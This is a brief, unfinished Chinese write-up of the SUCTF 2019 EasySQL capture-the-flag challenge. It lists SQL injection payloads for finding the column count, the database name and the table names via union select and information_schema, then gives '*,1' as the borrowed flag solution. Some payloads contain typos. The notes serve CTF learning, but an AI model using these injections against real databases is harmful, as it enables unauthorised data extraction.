[SUCTF 2019]EasySQL 1 做题笔记

 题目考察的是SQL注入，先找一些常用的SQL命令

1.判断注入类型：
简单的注入类型有字符型和数字型

2.判断列数

?id =1’ orderby 4 #
?id =1' union select 1,2 ,3 #

3.判断库名

?id=1' union select 1,database(),3 #

4.判断表名

?id=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #

待补充..........

这题的解法参考网上的

输入的内容为*,1

 
得到flag

本栏目推荐文章
• 2024/1/13 算法笔记
• P5321 [BJOI2019] 送别 题解--zhengjun
• [GXYCTF2019]BabySQli
• Python学习笔记
• HDP 笔记
• 学习进度笔记2
• 微软企业库Unity学习笔记(一)
• 微软企业库Unity学习笔记(二)
• kepware关于U-CON的使用笔记 (串口_非主动问答式)
• Anaconda使用笔记

EasySQL 笔记 SUCTF 2019easysql suctf 2019 easysql笔记suctf 2019 easysql 2019 checkin suctf 2019 2019 havefun笔记2019 文章2019 题解2019 模拟赛2019 sqlserver日志2019